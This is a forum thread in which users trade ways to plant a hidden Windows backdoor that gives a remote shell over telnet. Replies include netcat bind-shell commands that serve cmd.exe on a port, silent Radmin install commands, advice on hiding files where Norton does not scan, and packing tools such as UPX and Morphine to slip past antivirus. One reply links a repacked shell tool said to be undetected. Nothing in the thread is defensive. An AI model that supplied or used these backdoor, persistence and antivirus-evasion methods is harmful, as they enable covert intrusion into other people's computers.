Hey guys need some help. Whats the best program to use on a windows machine that will listen on a certain port, that i can telnet to and get a shell.

I looked into rsh.exe and rshd.exe, havent had much luck with them. And I also searched this forum, with most results talking about the shell you get after you sploit the box. I need a small dos prog i can setup as a service that will give me a shell when i telnet to it.

Also encryption and stealth (beating a security audit) are features that would come in handy.

Thanks guys.

i think the best one to do this job (because u can configure it the way u want) is winshell 5.0, and the most important thing is that antivirus doesnt seem to detect it.

here u can grabit.

Thanks for the help I'll check it out. It seems Symantec (Norton Anti-Virus) finds it.

http://securityresponse.symantec.com/avcen...shell.50.b.html


Anyone got a shell that isnt classified as a Backdoor trojan, or hack tool?

if u up and execute the file on system volume information u can use it without prob because NAV doesnt scan by default that section.

Netcat ....

nc.exe -l -d -p port -e cmd.exe

Netcat ....

nc.exe -L -d -p port -e cmd.exe

Make it a uppercase "-L" if you want the shell to respawn after you exit

try icmd.exe, u can setup a pass.... with netcat everyone can connect if they find the port.

damn icmd.exe is detected too. Anyone got some good links to tuts on changing some bytes around to avoid most A/V?

i believe the term is called "packing" probs the most common packer is upx..
there are other ones, you dont need to compress either. can just encrypt it.
nortons is gettting pretty good with detecting upx'd files to now.. perfect example is sdbot

Sparkles

The winshell server maker is detected, but the winshell server itself is not detected. I am on Norton Antivirus 2004 Pro, with the latest definitions and it doesnt have a clue about the winshell server. remember that you can make it different sizes.

you can also just install radmin which gives u telnet acces as a option..the files you need to upload r
AdmDll.dll
r_server.exe
radmin.reg---you need to get the reg files from your registry

Here are the commands to start it
regedit.exe /s radmin.reg
r_server.exe /install /silence
r_server.exe /start

hope this helped ya

problem with radmin its obvious inthe services listing (cant remember if you can change it with out brekaing it)

Sparkles

Try cryptcat. Should do the job, plus provides point-to-point encryption..

so i'll try the radmin. idon't really care if it's listed in the services list.
when u sing netcat witl the -L option, the port will be open all the time as i understood. how can you hold the backdoor open after a restart ?
install that command as firedaemon service ? or is there a better way ?

Can't rember what the tool is called but check out Hacking Exsposed Win2k. It's a simple way. Sorry not much use, my copy is packed away

hi, i compressed the tool icmd.exe with the upx packer so it wasn detected anymore by norton coporate edition. can you check if it is also not detected by other virus scanners, thx
http://212.202.50.233:88/icmd.zip

I tested it with 4 email virus scanner, but it wasnt detected.

Wolf 1.6 from xfocus.org isnt too bad, u can change the service name to what ever u want , have it password controled, pack it or use a UPX scrambler or Morphine12 to make it undetectable.
cheers

@SNOZZ:
Also, you can try to find older versions of Wolf. AFAIK some don't get detected at all but they work fine.

using packers and morphine and adding bytes tools , u can make winshell undetected i did that !

@ boshcash can you give me that tools?

big thx

WinShell 0WNz

nc is very good

As per one of the previous posters - cryptcat (nc.exe encrypted) will fullfill your needs:

Can listen on any port or go out on any port.
DES encryption (good foor getting around IDS)
Can reverse cmd.exe back as well.. (Good as a back door)

I think the best way to accomplish this is to make a batch calling netcat, and keeping it on a certain port, returning cmd.exe. Someone beat me to posting the code to do it... read up.

Some usefull replies ... THX

Norton Antivirus does not detect the server program... it only detects the "builder"

I tried it to detect with NAV 2004 + newest updates

is it to possible bind netcat with flags (nc -L -p <port> -e cmd.exe -d -vv) to an exe file using upx?

netcat is greet, but i didn't know a method for install the netcat with a service.

If u use the flag -L, u can enter in the server until that the server will be restarting...

nobody it knows a method to install a service for netcat?

bye and sorry for my english

but what if i bind netcat with the exe file and also bind a batch file to install netcat? In other words, bind both netcat and the batch file together with the exe file?

yea...netcat is probably he best idea

nc is the greatest

If you want encryptiont then you could use cryptcat, which is basically exactly the same as netcat, but encrypted

netcat is like a swiss army knife !

Grrrr, you CAN give netcat a password!!

Take a look at this post: Giving Netcat Password Functionality

(I do admit however, that it might not be the easiest of things.)

-ed.

Everyone keeps talking about a tool called Morphine to encrypt files, but I cant seem to find it anywhere. All i get in google are preformance enchancing drugs. =P

Where might it be?

a simple way to make netcat run at every start up is to make a batch file with the code below

edit
nvm

im having trouble with winshell i actually dont know how to login, i have netcat workin well and as a service but i want to get things more secure .. i install it and start the service but how do i login i see the C:\>telnet xxx.xxx.xxx.xxx 5277 but it cant connect when i put ip windows gives me an error .. i dont have a telnet either is that it? im lost please help

oops sorry for the dumb post ^^ i got it workin ima a total newb

i use srvcmd.exe. but there is no password protection. it runs hidden and you can choose port where you want to connect to via telnet.

http://www.free-host.com is Defaced!

< Sorry But I can not add a new topic yet! >

passiw but as your program is used ??

which it is the exact command?

thx u bye

ive had some sucess with this.

i noticed that the link above is a dead link , anyone cant find morphine tell me

can ppl just but the file in the posting it is easer for ppl

i would suggest radmin, its very useful

like a lot of ppl said.. netcat is pretty good